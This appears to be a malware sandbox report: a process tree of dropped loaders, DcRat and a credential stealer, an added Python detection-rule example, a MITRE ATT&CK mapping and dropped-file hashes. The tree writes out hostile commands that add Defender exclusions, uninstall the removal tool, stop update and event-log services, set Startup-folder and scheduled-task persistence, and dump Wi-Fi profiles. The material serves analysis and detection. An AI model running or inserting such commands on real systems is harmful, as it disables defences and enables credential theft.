      cmdline: reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1
[1] PID 3852  C:\Users\Admin\AppData\Local\Temp\EE16.exe
    cmdline: C:\Users\Admin\AppData\Local\Temp\EE16.exe
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
  [2] PID 4764  C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
      cmdline: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
[1] PID 3924  C:\Users\Admin\AppData\Local\Temp\7FD3.exe
    cmdline: C:\Users\Admin\AppData\Local\Temp\7FD3.exe
    - Executes dropped EXE
  [2] PID 5028  C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
      cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
[1] PID 436  C:\Windows\SysWOW64\WerFault.exe
    cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 2064 -ip 2064
[1] PID 6064  C:\ProgramData\Google\Chrome\updater.exe
    cmdline: C:\ProgramData\Google\Chrome\updater.exe
    - Executes dropped EXE
  [2] PID 3444  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
      cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
      - Modifies data under HKEY_USERS
  [2] PID 1092  C:\Windows\system32\cmd.exe
      cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
    [3] PID 5700  C:\Windows\system32\wusa.exe
        cmdline: wusa /uninstall /kb:890830 /quiet /norestart
  [2] PID 5400  C:\Windows\system32\sc.exe
      cmdline: C:\Windows\system32\sc.exe stop UsoSvc
      - Launches sc.exe
  [2] PID 3112  C:\Windows\system32\sc.exe
      cmdline: C:\Windows\system32\sc.exe stop WaaSMedicSvc
      - Launches sc.exe
  [2] PID 2364  C:\Windows\system32\sc.exe
      cmdline: C:\Windows\system32\sc.exe stop wuauserv
      - Launches sc.exe
  [2] PID 2072  C:\Windows\system32\sc.exe
      cmdline: C:\Windows\system32\sc.exe stop bits
      - Launches sc.exe
  [2] PID 4032  C:\Windows\system32\sc.exe
      cmdline: C:\Windows\system32\sc.exe stop dosvc
      - Launches sc.exe
  [2] PID 4024  C:\Windows\system32\powercfg.exe
      cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  [2] PID 3660  C:\Windows\system32\powercfg.exe
      cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  [2] PID 2172  C:\Windows\system32\powercfg.exe
      cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  [2] PID 2064  C:\Windows\system32\powercfg.exe
      cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
[1] PID 5036  C:\Users\Admin\AppData\Local\Temp\58E.exe
    cmdline: C:\Users\Admin\AppData\Local\Temp\58E.exe
  [2] PID 6008  C:\Windows\SysWOW64\cmd.exe
      cmdline: "C:\Windows\System32\cmd.exe" /k move Jeffrey Jeffrey.bat & Jeffrey.bat & exit
    [3] PID 3560  C:\Windows\SysWOW64\tasklist.exe
        cmdline: tasklist
        - Enumerates processes with tasklist
    [3] PID 4436  C:\Windows\SysWOW64\findstr.exe
        cmdline: findstr /I "wrsa.exe opssvc.exe"
    [3] PID 640  C:\Windows\SysWOW64\tasklist.exe
        cmdline: tasklist
        - Enumerates processes with tasklist
    [3] PID 4956  C:\Windows\SysWOW64\findstr.exe
        cmdline: findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
    [3] PID 3760  C:\Windows\SysWOW64\cmd.exe
        cmdline: cmd /c md 8484
    [3] PID 2444  C:\Windows\SysWOW64\cmd.exe
        cmdline: cmd /c copy /b Sitemap + Sublimedirectory + Cow + Rss + Josh 8484\Http.pif
    [3] PID 3744  C:\Windows\SysWOW64\cmd.exe
        cmdline: cmd /c copy /b Cdt + Thumbnail + Powers + Tamil + Capabilities + Novel + Cos + Breach + Canal + Hobby + Debut + Patricia + Neural + Translations + Fist + Able + Warner + Shapes + Ancient + Plans + Greg + Go + Drain + Mpeg + Necessary + Robertson + Islam + Generations + Trim + Around + Companion + Maiden + Kills + Eat + Brunswick + Ww + Determines + Login + Heads + Wv + Vampire + Consequence + Tba 8484\F
    [3] PID 1220  C:\Users\Admin\AppData\Local\Temp\8484\Http.pif
        cmdline: 8484\Http.pif 8484\F
    [3] PID 5700  C:\Windows\SysWOW64\PING.EXE
        cmdline: ping -n 5 127.0.0.1
        - Runs ping.exe
[1] PID 3040  C:\Users\Admin\AppData\Local\Temp\1510.exe
    cmdline: C:\Users\Admin\AppData\Local\Temp\1510.exe
  [2] PID 5396  C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
[1] PID 532  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4132 --field-trial-handle=2280,i,4114443225282860369,4764091921472631035,262144 --variations-seed-version /prefetch:8
[1] PID 1808  C:\Windows\SYSTEM32\cmd.exe
    cmdline: cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CodeForge.url" & echo URL="C:\Users\Admin\AppData\Local\ByteCraft Systems\CodeForge.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CodeForge.url" & exit
[1] PID 4312  C:\Windows\SYSTEM32\cmd.exe
    cmdline: cmd /c schtasks.exe /create /tn "Tex" /tr "wscript 'C:\Users\Admin\AppData\Local\ByteCraft Systems\CodeForge.js'" /sc minute /mo 3 /F
  [2] PID 2420  C:\Windows\system32\schtasks.exe
      cmdline: schtasks.exe /create /tn "Tex" /tr "wscript 'C:\Users\Admin\AppData\Local\ByteCraft Systems\CodeForge.js'" /sc minute /mo 3 /F
      - DcRat
      - Creates scheduled task(s)
[1] PID 1752  C:\Users\Admin\AppData\Local\Temp\4E32.exe
    cmdline: C:\Users\Admin\AppData\Local\Temp\4E32.exe
  [2] PID 3268  C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
      cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
[1] PID 3280  C:\Users\Admin\AppData\Local\Temp\C95E.exe
    cmdline: C:\Users\Admin\AppData\Local\Temp\C95E.exe
[1] PID 1604  C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403101628281\assistant\assistant_installer.exe
    cmdline: "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403101628281\assistant\assistant_installer.exe"
  [2] PID 3984  C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403101628281\assistant\assistant_installer.exe
      cmdline: "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403101628281\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.20 --initial-client-data=0x284,0x288,0x28c,0x260,0x290,0x1000040,0x100004c,0x1000058
[1] PID 5480  C:\Windows\explorer.exe
    cmdline: explorer.exe
[1] PID 2420  C:\Users\Admin\AppData\Local\Temp\00c07260dc\explorgu.exe
    cmdline: C:\Users\Admin\AppData\Local\Temp\00c07260dc\explorgu.exe
  [2] PID 6032  C:\Windows\SysWOW64\rundll32.exe
      cmdline: "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll, Main
    [3] PID 1268  C:\Windows\system32\rundll32.exe
        cmdline: "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll, Main
      [4] PID 5136  C:\Windows\system32\netsh.exe
          cmdline: netsh wlan show profiles
      [4] PID 4248  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          cmdline: powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\808065738166_Desktop.zip' -CompressionLevel Optimal
  [2] PID 2764  C:\Windows\SysWOW64\rundll32.exe
      cmdline: "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
[1] PID 4304  C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
    cmdline: "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
[1] PID 4444  C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
    cmdline: "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
[1] PID 1712  C:\Windows\explorer.exe
    cmdline: explorer.exe
[1] PID 4256  C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
    cmdline: "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
[1] PID 4652  C:\Windows\explorer.exe
    cmdline: explorer.exe
[1] PID 4080  C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
    cmdline: "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
[1] PID 5580  C:\Windows\explorer.exe
    cmdline: explorer.exe
[1] PID 3944  C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
    cmdline: "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
[1] PID 4240  C:\Windows\system32\wscript.EXE
    cmdline: C:\Windows\system32\wscript.EXE "C:\Users\Admin\AppData\Local\ByteCraft Systems\CodeForge.js"
[1] PID 5448  C:\Windows\explorer.exe
    cmdline: explorer.exe
[1] PID 6000  C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
    cmdline: "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
[1] PID 4844  C:\Windows\explorer.exe
    cmdline: explorer.exe
[1] PID 4468  C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
    cmdline: "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
[1] PID 2320  C:\Windows\explorer.exe
    cmdline: explorer.exe
[1] PID 3460  C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
    cmdline: "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
[1] PID 1392  C:\Windows\explorer.exe
    cmdline: explorer.exe
[1] PID 4164  C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
    cmdline: "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
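The same loader chain runs three times in the tree above (under eNjkg8FaEHV29ts9FvoPTUAW.exe, SvBLsShwKaL8PBWdxkM39f0T.exe and the service binary C:\ProgramData\Google\Chrome\updater.exe): a Defender exclusion for the whole user profile and ProgramData, a quiet uninstall of KB890830 (the Malicious Software Removal Tool), sc.exe stopping the update, BITS, delivery-optimisation and event-log services, powercfg disabling sleep, and a service named GoogleUpdateTaskMachineQC whose binary lives under ProgramData. The other families add a minute-interval scheduled task pointing at a Temp binary and a .url dropped in the Startup folder. The rules below turn those command lines into detections. This is an added example, not part of the sandbox report or of any detection product; the process events are constructed from the report's own command lines, and the event field names and rule names are assumptions.

```python
"""Detection rules for the loader behaviour recorded in the process tree.

Added example, not part of the sandbox report. Events are constructed here
from the report's own command lines; field names and rule names are assumed.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    rule: str
    pid: int
    cmdline: str


# Constructed sample events (image, command line, PID) copied from the tree;
# the last one is a benign control that must not fire.
EVENTS = [
    {"pid": 1892, "image": r"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force"},
    {"pid": 3712, "image": r"C:\Windows\system32\wusa.exe",
     "cmdline": "wusa /uninstall /kb:890830 /quiet /norestart"},
    {"pid": 1604, "image": r"C:\Windows\system32\sc.exe",
     "cmdline": r"C:\Windows\system32\sc.exe stop WaaSMedicSvc"},
    {"pid": 5648, "image": r"C:\Windows\system32\sc.exe",
     "cmdline": r"C:\Windows\system32\sc.exe stop eventlog"},
    {"pid": 4120, "image": r"C:\Windows\system32\sc.exe",
     "cmdline": r'C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"'},
    {"pid": 652, "image": r"C:\Windows\SysWOW64\schtasks.exe",
     "cmdline": r"""schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F"""},
    {"pid": 1808, "image": r"C:\Windows\SYSTEM32\cmd.exe",
     "cmdline": r'cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CodeForge.url" & echo URL="C:\Users\Admin\AppData\Local\ByteCraft Systems\CodeForge.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CodeForge.url" & exit'},
    {"pid": 4564, "image": r"C:\Windows\system32\powercfg.exe",
     "cmdline": r"C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0"},
    {"pid": 9999, "image": r"C:\Windows\system32\sc.exe",
     "cmdline": r"C:\Windows\system32\sc.exe query wuauserv"},
]

# Locations a standard user can write to; a service or task whose binary
# lives here can be replaced without admin rights.
USER_WRITABLE = re.compile(r"(?i)^[a-z]:\\(users|programdata|windows\\temp)\\")
# Services the loader stops: Windows Update stack, BITS, delivery
# optimisation and the event log.
PROTECTED_SERVICES = {"usosvc", "waasmedicsvc", "wuauserv", "bits", "dosvc", "eventlog"}
STARTUP_DIR = "\\start menu\\programs\\startup\\"


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def check_event(ev: dict) -> list:
    """Apply every rule to one process-creation event; return its findings."""
    img, cl, pid = _basename(ev["image"]), ev["cmdline"], ev["pid"]
    low = cl.lower()
    found = []

    # Defender exclusion covering whole directories or an extension.
    if img == "powershell.exe" and "add-mppreference" in low and "-exclusion" in low:
        found.append(Finding("defender_exclusion_added", pid, cl))

    # Quiet removal of KB890830 (Malicious Software Removal Tool).
    if img == "wusa.exe" and "/uninstall" in low and "kb:890830" in low:
        found.append(Finding("msrt_uninstalled", pid, cl))

    if img == "sc.exe":
        m = re.match(r"\S+\s+stop\s+\"?([\w-]+)", low)
        if m and m.group(1) in PROTECTED_SERVICES:
            found.append(Finding("protected_service_stopped", pid, cl))
        # sc create ... binpath= <user-writable path>
        m = re.search(r"binpath=\s*\"?([^\"\s]+)", cl, re.IGNORECASE)
        if " create " in low and m and USER_WRITABLE.match(m.group(1)):
            found.append(Finding("service_binpath_user_writable", pid, cl))

    # schtasks /create ... /tr '<user-writable binary>'
    if img == "schtasks.exe" and "/create" in low:
        m = re.search(r"/tr\s+\"?'?([^\"']+)", cl, re.IGNORECASE)
        if m and USER_WRITABLE.match(m.group(1).strip()):
            found.append(Finding("task_runs_user_writable_binary", pid, cl))

    # Shell redirection into the per-user Startup folder.
    if img == "cmd.exe" and STARTUP_DIR in low and ">" in cl:
        found.append(Finding("startup_folder_write", pid, cl))

    # powercfg /x -<timer> 0 keeps the host awake for a miner.
    if img == "powercfg.exe" and "timeout" in low and low.rstrip().endswith(" 0"):
        found.append(Finding("sleep_timers_disabled", pid, cl))

    return found


def scan(events: list) -> list:
    return [f for ev in events for f in check_event(ev)]


def rules_fired(events: list) -> list:
    """Distinct rule names, sorted, for a quick verdict on a host."""
    return sorted({f.rule for f in scan(events)})


if __name__ == "__main__":
    for f in scan(EVENTS):
        print(f"[{f.rule}] pid={f.pid}: {f.cmdline[:90]}")
```

Each rule keys on the image name plus the argument shape rather than on the exact strings in this report, so the same logic fires on a different service name or drop path; the benign `sc.exe query` control shows that a plain service query does not trip the `stop`/`create` checks.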
MITRE ATT&CK Enterprise v15
Persistence
- Boot or Logon Autostart Execution (1)
  - Registry Run Keys / Startup Folder (1)
- Create or Modify System Process (3)
  - Windows Service (3)
- Scheduled Task/Job (1)
Privilege Escalation
- Boot or Logon Autostart Execution (1)
  - Registry Run Keys / Startup Folder (1)
- Create or Modify System Process (3)
  - Windows Service (3)
- Scheduled Task/Job (1)
Defense Evasion
- File and Directory Permissions Modification (1)
- Impair Defenses (2)
  - Disable or Modify System Firewall (1)
- Modify Registry (3)
- Subvert Trust Controls (1)
  - Install Root Certificate (1)
Downloads
-
Filesize
11KB
MD5a33e5b189842c5867f46566bdbf7a095
SHA1e1c06359f6a76da90d19e8fd95e79c832edb3196
SHA2565abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454
SHA512f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b
-
Filesize
92KB
MD54c2e2189b87f507edc2e72d7d55583a0
SHA11f06e340f76d41ea0d1e8560acd380a901b2a5bd
SHA25699a5f8dea08b5cf512ed888b3e533cc77c08dc644078793dc870abd8828c1bca
SHA5128b6b49e55afe8a697aaf71d975fab9e906143339827f75a57876a540d0d7b9e3cbbcdd8b5435d6198900a73895cc52d2082e66ee8cec342e72f2e427dde71600
-
Filesize
1.5MB
MD5aa590645e033ea8f8470a1b45ee309d5
SHA1b1fdc29f7f90edb21ae265f2a2f1b269d08c3423
SHA256378bbecf4372e7162b2c97e6331fb67a5c030e2d2976c5343a168f1d73cab216
SHA51225582d41b161917cdad4ba545602378351005e7df1d9f9857eaef6133c52695702dfbbd611818dc3877532b2a4607f69aa90e6aa8b08f13db9f3df49b0843b93
-
Filesize
220KB
MD5302e7bb88e0ca2e0a4b0fcb784f8e921
SHA179304b5359b5a5ffa222a48373d214ff7bdca8e9
SHA2560583a074f22df06e2e66267c0cd1789e77849b6e7efaf9409baf814e95374f7b
SHA512b15a5c71ba415d794690d49ba1585866a88e3d437c95c5e78f057a22108c6018441df3ee4a66b05133999fb42a043423317792f785ac2d42c8a73bee33c805b6
-
Filesize
2.6MB
MD53d233051324a244029b80824692b2ad4
SHA1a053ebdacbd5db447c35df6c4c1686920593ef96
SHA256fbd467ce72bca00eea3aaa6f32abc8aca1a734030d082458e21e1fe91e6a8d84
SHA5127f19c6400ac46556a9441844242b1acb0b2f11a47f5d51f6d092406a8c759a6d78c578bb5b15035e7cd1cdb3035acf0db884708b0da1a83eb652a50a68e3a949
-
Filesize
693KB
MD574969bd8528b1b57ffca52e0bc7b3b54
SHA1ecc0a25b31ba6c60c1125693a027bc9cb401c707
SHA25603552373b313b775ae58f0c3cc4bdc9e4fa640ad0763c58188b761d1395a8bc2
SHA512608a98eb531e417b99f5cfc6069ca5220b6ffe2624ca7b3c2e2c379a2595716b55f08906f3a6289ff4a485bfcd72def5cf4ae8ca58aa84e2b483fa48c1b38006
-
Filesize
593KB
MD5c8fd9be83bc728cc04beffafc2907fe9
SHA195ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040
-
Filesize
2.0MB
MD51cc453cdf74f31e4d913ff9c10acdde2
SHA16e85eae544d6e965f15fa5c39700fa7202f3aafe
SHA256ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5
SHA512dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571
-
Filesize
1.2MB
MD50b4b6144c0d7281a4d2e34e44199d0c5
SHA109c4e8d1a63e301444d01223ffc6d2b1a86173b3
SHA25647dc2d1974e63e35b98b757796e6ff73eacafd5ccf9cb77ec09ed6911c45ad4b
SHA5127c8ba0af622290dde8cec2a958764b17864bcdc92fcee8820dbaac9cf271d6bb46dc0a350c67f09f9fe37ad45362c72f6d339e6683f5f7abf361c4a6be90db81
-
Filesize
1.1MB
MD5ddf5fe475916a430fb18941d19c89211
SHA1d31eebd92782de2e18be0c0a2d022a78ca4e74be
SHA2566e69754e03ca086758cd9c99afc004ca90d50b47e695addadaee64020311c8e9
SHA5125f853ffb1ca02b5224223d85c83acb4f1ff05065e2854b601cd8c72ba5912786d4980a48e0c82676b51a75a922b6441a34c11209c70b9d95c347d28982ba0386
-
Filesize
984KB
MD581de79f779f7485a323903718d959374
SHA13baee3a8ea2d1451064c00ef2fdad79404a2565d
SHA256deca6bfd0957e2ee8d1dbb08e545a20d63e0cdb691873aa42ebbaa70c0c0f61b
SHA512dc5dbb1ca1e643d7880a7257293bf834f1e0c00cad08d6d2aa66fbd68826d5a92f8ac3326f128f0be194141b12932740368dd9c415f1384ca7745310ed4a6703
-
Filesize
122KB
MD56231b452e676ade27ca0ceb3a3cf874a
SHA1f8236dbf9fa3b2835bbb5a8d08dab3a155f310d1
SHA2569941eee1cafffad854ab2dfd49bf6e57b181efeb4e2d731ba7a28f5ab27e91cf
SHA512f5882a3cded0a4e498519de5679ea12a0ea275c220e318af1762855a94bdac8dc5413d1c5d1a55a7cc31cfebcf4647dcf1f653195536ce1826a3002cf01aa12c
-
Filesize
1KB
MD547b22c695811b64b1c8ff3933f9ea6da
SHA1546e84c0f5b0062701a52f7fa7c22db48cc73cfd
SHA256a560208d6f4bc9b797926c8621f3657071918c88389c31e5a8a8851bb77bac07
SHA512a5342e8b3be45e1487f3356827796852c51c783d262ecebed6636402f38c40786027d10f9979135dda528ccb6e6d4931f92177a1c9e0d91da37919034268ac40
-
Filesize
2B
MD5d751713988987e9331980363e24189ce
SHA197d170e1550eee4afc0af065b78cda302a97674c
SHA2564f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
-
Filesize
40B
MD520d4b8fa017a12a108c87f540836e250
SHA11ac617fac131262b6d3ce1f52f5907e31d5f6f00
SHA2566028bd681dbf11a0a58dde8a0cd884115c04caa59d080ba51bde1b086ce0079d
SHA512507b2b8a8a168ff8f2bdafa5d9d341c44501a5f17d9f63f3d43bd586bc9e8ae33221887869fa86f845b7d067cb7d2a7009efd71dda36e03a40a74fee04b86856
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403101628281\additional_file0.tmp
Filesize2.5MB
MD520d293b9bf23403179ca48086ba88867
SHA1dedf311108f607a387d486d812514a2defbd1b9e
SHA256fd996b95ae46014edfd630bfc2bf8bc9e626adf883a1da017a8c3973b68ec348
SHA5125d575c6f0d914583f9bb54f7b884caf9182f26f850da9bdd962f4ed5ed7258316a46fafaf3828dccb6916baaadb681fe1d175a3f4ed59f56066dc7e32b66f7b6
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403101628281\assistant\assistant_installer.exe
Filesize622KB
MD510ab819cc1fd05db944a461213acf560
SHA1c2e41cb4d74e28351437f7a879bea3355c210ebf
SHA256ea86bedcce197838b0817719f395b9fdc978d4b07be79703e2e0aae11212dd8e
SHA51267ec7a885445de734e96545fc1646b6a86727c1d62ebde530ff3e1f0fe7d0afa5b9ca27d1b293f26f802358052bf46ad2815084c763d8678bd05148ac2d46512
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403101628281\assistant\assistant_installer.exe
Filesize192KB
MD57b1d5aaede95bc464a6bc0494c0ffe07
SHA18f1147308a389eb9aded7aec9eba9cbce2e25839
SHA256193d24c87e4f2c8ef05ae9b3b9c4e10248b9add7a38f228b4c6ebcf161bcb40c
SHA5124ff9827818a7ac021383293dfb061ad0a6a5430ea38908c1a7243f06ae5c530a34fb5d2c69ff15ed23eadd62d27a5a6627a8549d9f1a09585d5ea8b53753d1d8
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403101628281\assistant\dbgcore.dll
Filesize51KB
MD5e06f8bf58534ef7c5124c4f78e7a07dd
SHA1c9d2e9f84318de88cd94e12d8a8635ff248b7190
SHA2560fc30d71b17cb17dab1088cb80aff056f64e59fa2c3f2b54d384bd8be34cba06
SHA512f822eb539e027dc508142cf6188b6bff1fa098bd2dd7811fb9ed90031f3d2ecf56cdcef753e2563d06889a01c0a172c929826e59a2891676361558939315bccd
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403101628281\assistant\dbgcore.dll
Filesize166KB
MD58b6f64e5d3a608b434079e50a1277913
SHA103f431fabf1c99a48b449099455c1575893d9f32
SHA256926d444ffca166e006920412677c4ed2ef159cf0efc0578cb45b824f428f5eb2
SHA512c9aeac62ece564ac64a894300fb9d41d13f22951ead73421854c23c506760d984dff0af92bef2d80f3a66e782f0075832e9c24a50ae6110d27a25c14e065b41c
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403101628281\assistant\dbghelp.dll
Filesize375KB
MD5d9898f7b271fb93f85edc56f6eb12df2
SHA1dbbfa79af1636cb95cf1fc60c5bd5cfef3d1ffd7
SHA2567928244d487f29c60473295382bd2978ef80ad72a578d6fa6201d28d79d63b68
SHA512fe5540f0805a24d40aefc4476ed0fe5daa48a3f0f02073eead782a8ba8d39f53407456746ce8b341c076fafc5d79457922d04caf202edcad059a421b08ece16b
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403101628281\assistant\dbghelp.dll
Filesize1.5MB
MD5bfeb92b427ed6d61a15de77c52d5b361
SHA119e8a46b84041f30279a3470765d027279dde58e
SHA256d7f1d277b2493e73efeec2f396907bf6eb2d7da2b04d940801cc62486d2c0533
SHA5123274a96a7a78d7468c698aedf9829983afc6eed67a20a4ee9b3fb9a95e6e23af2be422c151d0b3a7c47eaec68719d27c516130d909dda16abe73fdf5494a8479
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403101628281\assistant\dbghelp.dll
Filesize1.3MB
MD56ee8b6a773f68a59355ce01c8466b2ff
SHA188cd545c2b9cc8f497e9f838d1dcbd029a753689
SHA2560734fa38d671afe3b31989f8fc560320269a9aab00a60458aada68366758dff9
SHA5125f2b88e257afebc8a274038940a47af9af1b301d2ffaf2df8105ad5140af9379c08024931b6f4202da9cc2f4b16dbee25e37f21e11f40fea956f2c0dc93278b0
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403101628281\opera_package
Filesize1.8MB
MD58e234ebc7ada13a83034ede749b0bad2
SHA16e921c590fab1b79ad1074451a7e3933b50a5733
SHA256dc1edcb62279d45c8cf2bd99b56b6c9cd2042b11783057bd014c87819b9e21b9
SHA5121d89b764cec9a306e0ba06e65eb4917570a5bd85d265c1c4da5d319f4fb34c3346f20a695f1dcff9e6fd6cae6d57299fbb0f808b3686126728f38d58f9289741
-
Filesize
448KB
MD5db04f566eaffca5474d03ead0a08a16a
SHA1898508ca54f12193cc1e3085b2debfb4f23f7cde
SHA25614a1853237ca0895d78461ee94572b6d7e56e4f3f6e1d692b824ac904aea09a0
